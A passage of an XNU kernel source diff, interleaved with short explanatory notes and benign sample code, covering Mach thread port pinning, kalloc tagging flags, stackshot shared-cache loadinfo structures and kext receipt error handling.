@@ -3969,3 +4499,35 @@ task_get_exception_ports_from_user(
        task_deallocate(task);
        return kr;
 }
+
+/*
+ *     Routine:        ipc_thread_port_unpin
+ *     Purpose:
+ *             Called on the thread port when the thread is
+ *             terminating so that the last ref can be deallocated
+ *             without a guard exception.
+ *     Conditions:
+ *             Thread mutex lock is held.
+ *             check_bit should be set to true only when port is expected
+ *             to have ip_pinned bit set.
+ */
+void
+ipc_thread_port_unpin(
+       ipc_port_t port,
+       __unused bool check_bit)
+{
+       if (port == IP_NULL) {
+               return;
+       }
+       ip_lock(port);
+       imq_lock(&port->ip_messages);
+#if DEVELOPMENT || DEBUG
+       if (pinned_control_port_enabled && check_bit) {
+               assert(ip_is_control(port)); /* remove once we get rid of boot-arg */
+               assert(port->ip_pinned == 1);
+       }
+#endif
+       port->ip_pinned = 0;
+       imq_unlock(&port->ip_messages);
+       ip_unlock(port);
+}
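
For context on the convention the exception-port getters above implement: *CountCnt is in/out, meaning the caller passes the capacity of the masks/ports/behaviors/flavors arrays and the kernel returns the number of distinct (port, behavior, flavor) tuples it coalesced, which is what the "count < *CountCnt" check in the loop enforces. A minimal user-space sketch against the long-standing public MIG call; the array sizing and error handling are illustrative only, and the new *_info variants return sanitized ipc_info_port_t records rather than send rights:

    #include <stdio.h>
    #include <mach/mach.h>
    #include <mach/mach_error.h>

    int
    main(void)
    {
        exception_mask_t       masks[EXC_TYPES_COUNT];
        mach_port_t            ports[EXC_TYPES_COUNT];
        exception_behavior_t   behaviors[EXC_TYPES_COUNT];
        thread_state_flavor_t  flavors[EXC_TYPES_COUNT];
        mach_msg_type_number_t count = EXC_TYPES_COUNT;   /* capacity in, tuple count out */

        kern_return_t kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL,
            masks, &count, ports, behaviors, flavors);
        if (kr != KERN_SUCCESS) {
            fprintf(stderr, "task_get_exception_ports: %s\n", mach_error_string(kr));
            return 1;
        }
        for (mach_msg_type_number_t i = 0; i < count; i++) {
            printf("entry %u: mask=0x%x port=0x%x behavior=0x%x flavor=%d\n",
                i, masks[i], ports[i], (unsigned)behaviors[i], flavors[i]);
        }
        return 0;
    }
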
index 2ebe7e28968e05d289f0d04b75196034fddb6d98..1e8d2c401a4e983859917ee385d07169e330011d 100644 (file)
@@ -93,9 +93,16 @@ extern void ipc_task_reset(
 extern void ipc_task_terminate(
        task_t          task);
 
+__options_decl(ipc_thread_init_options_t, uint32_t, {
+       IPC_THREAD_INIT_NONE      = 0x00,
+       IPC_THREAD_INIT_PINNED    = 0x01,
+       IPC_THREAD_INIT_IMMOVABLE = 0x02,
+});
+
 /* Initialize a thread's IPC state */
 extern void ipc_thread_init(
-       thread_t        thread);
+       thread_t        thread,
+       ipc_thread_init_options_t options);
 
 extern void ipc_thread_init_exc_actions(
        thread_t        thread);
@@ -168,6 +175,10 @@ extern task_read_t convert_port_to_task_read(
 extern task_t convert_port_to_task(
        ipc_port_t      port);
 
+/* Convert from a port to a pinned task */
+extern task_t convert_port_to_task_pinned(
+       ipc_port_t      port);
+
 extern task_t
 convert_port_to_task_with_exec_token(
        ipc_port_t              port,
@@ -183,9 +194,6 @@ extern task_read_t port_name_to_task_read(
 extern task_read_t port_name_to_task_read_no_eval(
        mach_port_name_t name);
 
-extern task_inspect_t port_name_to_task_inspect(
-       mach_port_name_t name);
-
 extern task_t port_name_to_task_name(
        mach_port_name_t name);
 
@@ -254,4 +262,10 @@ extern void space_read_deallocate(
 extern void space_inspect_deallocate(
        ipc_space_inspect_t     space);
 
+#if MACH_KERNEL_PRIVATE
+extern void ipc_thread_port_unpin(
+       ipc_port_t port,
+       bool check_bit);
+#endif
+
 #endif  /* _KERN_IPC_TT_H_ */
index 6c4127fa6855742cbaa046b627220a06e88caa36..b77841e1c3b4f4ca4d051689e4d57d1b945dc46a 100644 (file)
@@ -750,8 +750,8 @@ kalloc_large(
        zalloc_flags_t        flags,
        vm_allocation_site_t  *site)
 {
-       int kma_flags = KMA_ATOMIC | KMA_KOBJECT;
-       vm_tag_t tag = VM_KERN_MEMORY_KALLOC;
+       int kma_flags = KMA_ATOMIC;
+       vm_tag_t tag;
        vm_map_t alloc_map;
        vm_offset_t addr;
 
@@ -764,6 +764,16 @@ kalloc_large(
                return (struct kalloc_result){ };
        }
 
+#ifndef __x86_64__
+       /*
+        * (73465472) on Intel we didn't use to pass this flag,
+        * which in turned allowed kalloc_large() memory to be shared
+        * with user directly.
+        *
+        * which in turn allowed kalloc_large() memory to be shared
+        */
+       kma_flags |= KMA_KOBJECT;
+#endif
        if (flags & Z_NOPAGEWAIT) {
                kma_flags |= KMA_NOPAGEWAIT;
        }
@@ -781,8 +791,13 @@ kalloc_large(
 
        alloc_map = kalloc_map_for_size(size);
 
-       if (site) {
-               tag = vm_tag_alloc(site);
+       tag = zalloc_flags_get_tag(flags);
+       if (tag == VM_KERN_MEMORY_NONE) {
+               if (site) {
+                       tag = vm_tag_alloc(site);
+               } else {
+                       tag = VM_KERN_MEMORY_KALLOC;
+               }
        }
 
        if (kmem_alloc_flags(alloc_map, &addr, size, tag, kma_flags) != KERN_SUCCESS) {
@@ -864,7 +879,6 @@ kalloc_ext(
        zalloc_flags_t        flags,
        vm_allocation_site_t  *site)
 {
-       vm_tag_t tag = VM_KERN_MEMORY_KALLOC;
        vm_size_t size;
        void *addr;
        zone_t z;
@@ -881,7 +895,7 @@ kalloc_ext(
         * Kasan for kalloc heaps will put the redzones *inside*
         * the allocation, and hence augment its size.
         *
-        * kalloc heaps do not use zone_t::kasan_redzone.
+        * kalloc heaps do not use zone_t::z_kasan_redzone.
         */
 #if KASAN_KALLOC
        size = kasan_alloc_resize(req_size);
@@ -903,15 +917,19 @@ kalloc_ext(
        assert(size <= zone_elem_size(z));
 
 #if VM_MAX_TAG_ZONES
-       if (z->tags && site) {
-               tag = vm_tag_alloc(site);
-               if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && !vm_allocation_zone_totals[tag]) {
-                       tag = VM_KERN_MEMORY_KALLOC;
+       if (z->tags) {
+               vm_tag_t tag = zalloc_flags_get_tag(flags);
+               if (tag == VM_KERN_MEMORY_NONE && site) {
+                       tag = vm_tag_alloc(site);
+               }
+               if (tag != VM_KERN_MEMORY_NONE) {
+                       tag = vm_tag_will_update_zone(tag, z->tag_zone_index,
+                           flags & (Z_WAITOK | Z_NOWAIT | Z_NOPAGEWAIT));
                }
+               flags |= Z_VM_TAG(tag);
        }
 #endif
-       addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats,
-           flags | Z_VM_TAG(tag), zone_elem_size(z) - size);
+       addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, flags);
 
 #if KASAN_KALLOC
        addr = (void *)kasan_alloc((vm_offset_t)addr, zone_elem_size(z),
index f2eaf624cbea7198077c96f2a903a4a4c69bac08..d57bd0c27ef979ff79b0014f49f8d6993e024da1 100644 (file)
@@ -492,7 +492,7 @@ struct kcdata_type_definition {
 #define STACKSHOT_KCTYPE_TASK_SNAPSHOT               0x905u /* task_snapshot_v2 */
 #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT             0x906u /* thread_snapshot_v2, thread_snapshot_v3 */
 #define STACKSHOT_KCTYPE_DONATING_PIDS               0x907u /* int[] */
-#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */
+#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* dyld_shared_cache_loadinfo */
 #define STACKSHOT_KCTYPE_THREAD_NAME                 0x909u /* char[] */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME             0x90Au /* struct stack_snapshot_frame32 */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME64           0x90Bu /* struct stack_snapshot_frame64 */
@@ -556,17 +556,42 @@ struct dyld_uuid_info_64 {
        uuid_t   imageUUID;
 };
 
+/*
+ * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures
+ * instead of this, since the field names match their contents better.
+ */
 struct dyld_uuid_info_64_v2 {
        uint64_t imageLoadAddress; /* XXX image slide */
        uuid_t   imageUUID;
        /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
-       uint64_t imageSlidBaseAddress; /* slid base address of image */
+       uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */
+};
+
+/*
+ * This is the renamed version of dyld_uuid_info_64 with more accurate
+ * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO.  Any users
+ * must be aware of the dyld_uuid_info_64* version history and ensure
+ * the fields they are accessing are within the actual bounds.
+ *
+ * OLD_FIELD              NEW_FIELD
+ * imageLoadAddress       sharedCacheSlide
+ * imageUUID              sharedCacheUUID
+ * imageSlidBaseAddress   sharedCacheUnreliableSlidBaseAddress
+ * -                      sharedCacheSlidFirstMapping
+ */
+struct dyld_shared_cache_loadinfo {
+       uint64_t sharedCacheSlide;      /* image slide value */
+       uuid_t   sharedCacheUUID;
+       /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
+       uint64_t sharedCacheUnreliableSlidBaseAddress;  /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */
+       /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */
+       uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */
 };
 
 struct dyld_aot_cache_uuid_info {
-       uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */
+       uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */
        uuid_t x86UUID; /* UUID of x86 shared cache */
-       uint64_t aotSlidBaseAddress; /* slide base address of aot cache */
+       uint64_t aotSlidBaseAddress; /* slid first mapping address of aot cache */
        uuid_t aotUUID; /* UUID of aot shared cache */
 };
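
Because the STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO payload has grown over time (24 bytes for v1, 32 for v2, 40 once sharedCacheSlidFirstMapping was added), a kcdata consumer has to bound its reads by the size of the item it actually received, as the comment above warns. A hypothetical parser-side helper, where loadinfo_view, loadinfo_read, item_data and item_size are illustrative names standing in for whatever the kcdata reader provides:

    #include <stddef.h>
    #include <stdint.h>
    #include <string.h>

    /* Mirrors struct dyld_shared_cache_loadinfo above; uuid_t is unsigned char[16]. */
    struct loadinfo_view {
        uint64_t      sharedCacheSlide;                      /* offset  0, v1 */
        unsigned char sharedCacheUUID[16];                   /* offset  8, v1 */
        uint64_t      sharedCacheUnreliableSlidBaseAddress;  /* offset 24, v2 */
        uint64_t      sharedCacheSlidFirstMapping;           /* offset 32, v3 */
    };

    static int
    loadinfo_read(const void *item_data, size_t item_size, struct loadinfo_view *out)
    {
        memset(out, 0, sizeof(*out));       /* absent fields read back as 0 */
        if (item_size < 24) {
            return -1;                      /* smaller than v1: not this record */
        }
        memcpy(out, item_data,
            item_size < sizeof(*out) ? item_size : sizeof(*out));
        return 0;
    }

A caller then treats a zero sharedCacheSlidFirstMapping as "field not emitted by this kernel" rather than as a real address.
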
 
@@ -618,6 +643,9 @@ enum task_snapshot_flags {
        kTaskIsDirtyTracked                   = 0x4000000,
        kTaskAllowIdleExit                    = 0x8000000,
        kTaskIsTranslated                     = 0x10000000,
+       kTaskSharedRegionNone                 = 0x20000000,     /* task doesn't have a shared region */
+       kTaskSharedRegionSystem               = 0x40000000,     /* task is attached to system shared region */
+       kTaskSharedRegionOther                = 0x80000000,     /* task is attached to a different shared region */
 };
 
 enum thread_snapshot_flags {
@@ -876,6 +904,12 @@ struct stackshot_duration {
        uint64_t stackshot_duration_outer;
 } __attribute__((packed));
 
+struct stackshot_duration_v2 {
+       uint64_t stackshot_duration;
+       uint64_t stackshot_duration_outer;
+       uint64_t stackshot_duration_prior;
+} __attribute__((packed));
+
 struct stackshot_fault_stats {
        uint32_t sfs_pages_faulted_in;      /* number of pages faulted in using KDP fault path */
        uint64_t sfs_time_spent_faulting;   /* MATUs spent faulting */
index 6edec68be9bcde9485c1e115bade5fff36006193..f424b0aee9e2480b29f8a4400bd6224ae5f3b185 100644 (file)
@@ -53,6 +53,7 @@
 #include <kern/coalition.h>
 #include <kern/processor.h>
 #include <kern/host_statistics.h>
+#include <kern/counter.h>
 #include <kern/thread.h>
 #include <kern/thread_group.h>
 #include <kern/task.h>
@@ -115,6 +116,8 @@ static boolean_t panic_stackshot;
 static boolean_t stack_enable_faulting = FALSE;
 static struct stackshot_fault_stats fault_stats;
 
+static uint32_t stackshot_initial_estimate;
+static uint64_t stackshot_duration_prior_abs;   /* prior attempts, abs */
 static unaligned_u64 * stackshot_duration_outer;
 static uint64_t stackshot_microsecs;
 
@@ -385,6 +388,11 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui
                goto out;
        }
 
+       stackshot_initial_estimate = 0;
+       stackshot_duration_prior_abs = 0;
+       stackshot_duration_outer = NULL;
+       uint64_t time_start      = mach_absolute_time();
+
        istate = ml_set_interrupts_enabled(FALSE);
 
        /* Preload trace parameters*/
@@ -399,6 +407,10 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui
 
        ml_set_interrupts_enabled(istate);
 
+       uint64_t time_end = mach_absolute_time();
+       if (stackshot_duration_outer) {
+               *stackshot_duration_outer = time_end - time_start;
+       }
        *bytes_traced = kdp_stack_snapshot_bytes_traced();
 
 out:
@@ -691,7 +703,9 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi
                goto error_exit;
        }
 
+       stackshot_duration_prior_abs = 0;
        stackshotbuf_size = get_stackshot_estsize(size_hint);
+       stackshot_initial_estimate = stackshotbuf_size;
 
        for (; stackshotbuf_size <= max_tracebuf_size; stackshotbuf_size <<= 1) {
                if (kmem_alloc_flags(kernel_map, (vm_offset_t *)&stackshotbuf, stackshotbuf_size, VM_KERN_MEMORY_DIAG, KMA_ZERO) != KERN_SUCCESS) {
@@ -755,6 +769,8 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi
                                /*
                                 * If we didn't allocate a big enough buffer, deallocate and try again.
                                 */
+                               stackshot_duration_prior_abs +=
+                                   (time_end - time_start);
                                continue;
                        } else {
                                goto error_exit;
@@ -968,16 +984,25 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
        kern_return_t error = KERN_SUCCESS;
 
        uint64_t shared_cache_slide = 0;
-       uint64_t shared_cache_base_address = 0;
+       uint64_t shared_cache_first_mapping = 0;
        uint32_t kdp_fault_results = 0;
-       struct dyld_uuid_info_64_v2 shared_cache_data = {0};
+       struct dyld_shared_cache_loadinfo shared_cache_data = {0};
 
 
        assert(task_snap_ss_flags != NULL);
 
+       /* Get basic info about the shared region pointer, regardless of any failures */
+       if (task->shared_region == NULL) {
+               *task_snap_ss_flags |= kTaskSharedRegionNone;
+       } else if (task->shared_region == primary_system_shared_region) {
+               *task_snap_ss_flags |= kTaskSharedRegionSystem;
+       } else {
+               *task_snap_ss_flags |= kTaskSharedRegionOther;
+       }
+
        if (task->shared_region && ml_validate_nofault((vm_offset_t)task->shared_region, sizeof(struct vm_shared_region))) {
                struct vm_shared_region *sr = task->shared_region;
-               shared_cache_base_address = sr->sr_base_address + sr->sr_first_mapping;
+               shared_cache_first_mapping = sr->sr_base_address + sr->sr_first_mapping;
 
        } else {
                *task_snap_ss_flags |= kTaskSharedRegionInfoUnavailable;
@@ -985,7 +1010,7 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
        }
 
        /* We haven't copied in the shared region UUID yet as part of setup */
-       if (!shared_cache_base_address || !task->shared_region->sr_uuid_copied) {
+       if (!shared_cache_first_mapping || !task->shared_region->sr_uuid_copied) {
                goto error_exit;
        }
 
@@ -995,15 +1020,27 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
         */
        shared_cache_slide = task->shared_region->sr_slide;
 
-       if (task->shared_region == init_task_shared_region) {
+       if (task->shared_region == primary_system_shared_region) {
                /* skip adding shared cache info -- it's the same as the system level one */
                goto error_exit;
        }
 
-       shared_cache_data.imageLoadAddress = shared_cache_slide;
-       stackshot_memcpy(&shared_cache_data.imageUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid));
-       shared_cache_data.imageSlidBaseAddress = shared_cache_base_address;
-       kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(struct dyld_uuid_info_64_v2), &shared_cache_data));
+       /*
+        * Historically, this data was in a dyld_uuid_info_64 structure, but the
+        * naming of both the structure and fields for this use wasn't great.  The
+        * dyld_shared_cache_loadinfo structure has better names, but the same
+        * layout and content as the original.
+        *
+        * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field
+        * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+        * entries; here, it's the slid first mapping, and we leave it that way
+        * for backwards compatibility.
+        */
+       shared_cache_data.sharedCacheSlide = shared_cache_slide;
+       stackshot_memcpy(&shared_cache_data.sharedCacheUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid));
+       shared_cache_data.sharedCacheUnreliableSlidBaseAddress = shared_cache_first_mapping;
+       shared_cache_data.sharedCacheSlidFirstMapping = shared_cache_first_mapping;
+       kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(shared_cache_data), &shared_cache_data));
 
 error_exit:
        if (kdp_fault_results & KDP_FAULT_RESULT_PAGED_OUT) {
@@ -1347,7 +1384,7 @@ kcdata_record_task_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t trace
        cur_tsnap->ts_did_throttle = (uint32_t) proc_did_throttle_from_task(task);
 
        cur_tsnap->ts_suspend_count = task->suspend_count;
-       cur_tsnap->ts_faults = task->faults;
+       cur_tsnap->ts_faults = counter_load(&task->faults);
        cur_tsnap->ts_pageins = task->pageins;
        cur_tsnap->ts_cow_faults = task->cow_faults;
        cur_tsnap->ts_latency_qos = (task->effective_policy.tep_latency_qos == LATENCY_QOS_TIER_UNSPECIFIED) ?
@@ -1471,7 +1508,7 @@ kcdata_record_task_delta_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t
 
        cur_tsnap->tds_max_resident_size = get_task_resident_max(task);
        cur_tsnap->tds_suspend_count = task->suspend_count;
-       cur_tsnap->tds_faults            = task->faults;
+       cur_tsnap->tds_faults            = counter_load(&task->faults);
        cur_tsnap->tds_pageins           = task->pageins;
        cur_tsnap->tds_cow_faults        = task->cow_faults;
        cur_tsnap->tds_was_throttled     = (uint32_t)proc_was_throttled_from_task(task);
@@ -2348,6 +2385,9 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        if (trace_flags & STACKSHOT_PAGE_TABLES) {
                kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stack_snapshot_pagetable_mask, "stackshot_pagetable_mask"));
        }
+       if (stackshot_initial_estimate != 0) {
+               kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stackshot_initial_estimate, "stackshot_size_estimate"));
+       }
 
 #if STACKSHOT_COLLECTS_LATENCY_INFO
        latency_info.setup_latency = mach_absolute_time();
@@ -2383,28 +2423,41 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, KCDATA_TYPE_USECS_SINCE_EPOCH, sizeof(uint64_t), &stackshot_microsecs));
 
        /* record system level shared cache load info (if available) */
-       if (!collect_delta_stackshot && init_task_shared_region &&
-           ml_validate_nofault((vm_offset_t)init_task_shared_region, sizeof(struct vm_shared_region))) {
-               struct dyld_uuid_info_64_v2 sys_shared_cache_info = {0};
+       if (!collect_delta_stackshot && primary_system_shared_region &&
+           ml_validate_nofault((vm_offset_t)primary_system_shared_region, sizeof(struct vm_shared_region))) {
+               struct dyld_shared_cache_loadinfo sys_shared_cache_info = {0};
 
-               stackshot_memcpy(sys_shared_cache_info.imageUUID, &init_task_shared_region->sr_uuid, sizeof(init_task_shared_region->sr_uuid));
-               sys_shared_cache_info.imageLoadAddress =
-                   init_task_shared_region->sr_slide;
-               sys_shared_cache_info.imageSlidBaseAddress =
-                   init_task_shared_region->sr_slide + init_task_shared_region->sr_base_address;
+               /*
+                * Historically, this data was in a dyld_uuid_info_64 structure, but the
+                * naming of both the structure and fields for this use isn't great.  The
+                * dyld_shared_cache_loadinfo structure has better names, but the same
+                * layout and content as the original.
+                *
+                * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field
+                * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+                * entries; here, it's the slid base address, and we leave it that way
+                * for backwards compatibility.
+                */
+               stackshot_memcpy(sys_shared_cache_info.sharedCacheUUID, &primary_system_shared_region->sr_uuid, sizeof(primary_system_shared_region->sr_uuid));
+               sys_shared_cache_info.sharedCacheSlide =
+                   primary_system_shared_region->sr_slide;
+               sys_shared_cache_info.sharedCacheUnreliableSlidBaseAddress =
+                   primary_system_shared_region->sr_slide + primary_system_shared_region->sr_base_address;
+               sys_shared_cache_info.sharedCacheSlidFirstMapping =
+                   primary_system_shared_region->sr_base_address + primary_system_shared_region->sr_first_mapping;
 
                kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO,
-                   sizeof(struct dyld_uuid_info_64_v2), &sys_shared_cache_info));
+                   sizeof(sys_shared_cache_info), &sys_shared_cache_info));
 
                if (trace_flags & STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT) {
                        /*
                         * Include a map of the system shared cache layout if it has been populated
                         * (which is only when the system is using a custom shared cache).
                         */
-                       if (init_task_shared_region->sr_images && ml_validate_nofault((vm_offset_t)init_task_shared_region->sr_images,
-                           (init_task_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) {
-                               assert(init_task_shared_region->sr_images_count != 0);
-                               kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), init_task_shared_region->sr_images_count, init_task_shared_region->sr_images));
+                       if (primary_system_shared_region->sr_images && ml_validate_nofault((vm_offset_t)primary_system_shared_region->sr_images,
+                           (primary_system_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) {
+                               assert(primary_system_shared_region->sr_images_count != 0);
+                               kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), primary_system_shared_region->sr_images_count, primary_system_shared_region->sr_images));
                        }
                }
        }
@@ -2502,7 +2555,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                if (!panic_stackshot && (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS)) {
                        coalition_begin_cpu_cycle_count = mt_cur_cpu_cycles();
                }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */
 
                /* Iterate over coalitions */
                if (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS) {
@@ -2530,7 +2583,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                        kcd_exit_on_error(kcdata_add_uint64_with_description(stackshot_kcdata_p, (mt_cur_cpu_cycles() - coalition_begin_cpu_cycle_count),
                            "coalitions_cpu_cycle_count"));
                }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */
        }
 #else
        trace_flags &= ~(STACKSHOT_SAVE_JETSAM_COALITIONS);
@@ -2557,7 +2610,6 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                }
        }
 
-
 #if STACKSHOT_COLLECTS_LATENCY_INFO
        latency_info.total_terminated_task_iteration_latency = mach_absolute_time() - latency_info.total_terminated_task_iteration_latency;
 #endif /* STACKSHOT_COLLECTS_LATENCY_INFO */
@@ -2576,22 +2628,22 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
 
        /* update timestamp of the stackshot */
        abs_time_end = mach_absolute_time();
-#if DEVELOPMENT || DEBUG
-       struct stackshot_duration stackshot_duration;
-       stackshot_duration.stackshot_duration         = (abs_time_end - abs_time);
-       stackshot_duration.stackshot_duration_outer   = 0;
+       struct stackshot_duration_v2 stackshot_duration = {
+               .stackshot_duration         = (abs_time_end - abs_time),
+               .stackshot_duration_outer   = 0,
+               .stackshot_duration_prior   = stackshot_duration_prior_abs,
+       };
 
        if ((trace_flags & STACKSHOT_DO_COMPRESS) == 0) {
                kcd_exit_on_error(kcdata_get_memory_addr(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION,
-                   sizeof(struct stackshot_duration), &out_addr));
-               struct stackshot_duration *duration_p = (void *) out_addr;
+                   sizeof(struct stackshot_duration_v2), &out_addr));
+               struct stackshot_duration_v2 *duration_p = (void *) out_addr;
                stackshot_memcpy(duration_p, &stackshot_duration, sizeof(*duration_p));
                stackshot_duration_outer                   = (unaligned_u64 *)&duration_p->stackshot_duration_outer;
        } else {
                kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, sizeof(stackshot_duration), &stackshot_duration));
                stackshot_duration_outer = NULL;
        }
-#endif
 
 #if INTERRUPT_MASKED_DEBUG && MONOTONIC
        if (!panic_stackshot) {
@@ -2610,15 +2662,20 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        *pBytesTraced = (uint32_t) kcdata_memory_get_used_bytes(stackshot_kcdata_p);
        *pBytesUncompressed = (uint32_t) kcdata_memory_get_uncompressed_bytes(stackshot_kcdata_p);
 
-error_exit:
+error_exit:;
 
 #if INTERRUPT_MASKED_DEBUG
-       if (trace_flags & STACKSHOT_DO_COMPRESS) {
+       bool disable_interrupts_masked_check = kern_feature_override(
+               KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD) ||
+           (trace_flags & STACKSHOT_DO_COMPRESS) != 0;
+
+#if STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED
+       disable_interrupts_masked_check = true;
+#endif /* STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED */
+
+       if (disable_interrupts_masked_check) {
                ml_spin_debug_clear_self();
        }
-#if defined(STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED)
-       ml_spin_debug_clear_self();
-#endif
 
        if (!panic_stackshot && interrupt_masked_debug) {
                /*
@@ -2627,7 +2684,7 @@ error_exit:
                 */
                ml_check_stackshot_interrupt_disabled_duration(current_thread());
        }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG */
 
        stack_enable_faulting = FALSE;
 
@@ -2668,10 +2725,8 @@ kdp_mem_and_io_snapshot(struct mem_and_io_snapshot *memio_snap)
        uint64_t compressions = 0;
        uint64_t decompressions = 0;
 
-       percpu_foreach(stat, vm_stat) {
-               compressions += stat->compressions;
-               decompressions += stat->decompressions;
-       }
+       compressions = counter_load(&vm_statistics_compressions);
+       decompressions = counter_load(&vm_statistics_decompressions);
 
        memio_snap->snapshot_magic = STACKSHOT_MEM_AND_IO_SNAPSHOT_MAGIC;
        memio_snap->free_pages = vm_page_free_count;
@@ -3105,7 +3160,7 @@ stackshot_thread_group_snapshot(void *arg, int i, struct thread_group *tg)
 {
        struct thread_group_snapshot_v2 *thread_groups = (struct thread_group_snapshot_v2 *)arg;
        struct thread_group_snapshot_v2 *tgs = &thread_groups[i];
-       uint64_t flags = kdp_thread_group_get_flags(tg);
+       uint32_t flags = thread_group_get_flags(tg);
        tgs->tgs_id = thread_group_get_id(tg);
        stackshot_memcpy(tgs->tgs_name, thread_group_get_name(tg), THREAD_GROUP_MAXNAME);
        tgs->tgs_flags = ((flags & THREAD_GROUP_FLAGS_EFFICIENT) ? kThreadGroupEfficient : 0) |
index 5a689341faccbe2e18ea5999cf32706b71a0a551..2abe7d4d9b276d5740370903e56b211e9f1392e1 100644 (file)
@@ -39,6 +39,7 @@
 #include <mach-o/loader.h>
 #include <libkern/kernel_mach_header.h>
 #include <libkern/prelink.h>
+#include <libkern/OSKextLibPrivate.h>
 #include <san/kasan.h>
 
 #define KASLR_IOREG_DEBUG 0
@@ -246,23 +247,57 @@ kext_free(vm_offset_t addr, vm_size_t size)
 kern_return_t
 kext_receipt(void **addrp, size_t *sizep)
 {
+       kern_return_t ret = KERN_FAILURE;
        if (addrp == NULL || sizep == NULL) {
-               return KERN_FAILURE;
+               goto finish;
        }
 
        kernel_mach_header_t *kc = PE_get_kc_header(KCKindAuxiliary);
        if (kc == NULL) {
-               return KERN_FAILURE;
+               ret = KERN_MISSING_KC;
+               goto finish;
+       }
+
+       /*
+        * This will be set in early boot once we've successfully checked that
+        * the AuxKC is properly linked against the BootKC. If this isn't set,
+        * and we have a valid AuxKC mach header, then the booter gave us a
+        * bad KC.
+        */
+       if (auxkc_uuid_valid == FALSE) {
+               ret = KERN_INVALID_KC;
+               goto finish;
        }
 
        size_t size;
        void *addr = getsectdatafromheader(kc,
            kReceiptInfoSegment, kAuxKCReceiptSection, &size);
        if (addr == NULL) {
-               return KERN_FAILURE;
+               ret = KERN_INVALID_KC;
+               goto finish;
        }
 
        *addrp = addr;
        *sizep = size;
-       return KERN_SUCCESS;
+       ret = KERN_SUCCESS;
+
+finish:
+       /*
+        * If we do return success, we'll want to wait for the other side to
+        * call kext_receipt_set_queried themselves, so we can confirm that
+        * it made the roundtrip before allowing third party kexts to load.
+        */
+       if (ret != KERN_SUCCESS) {
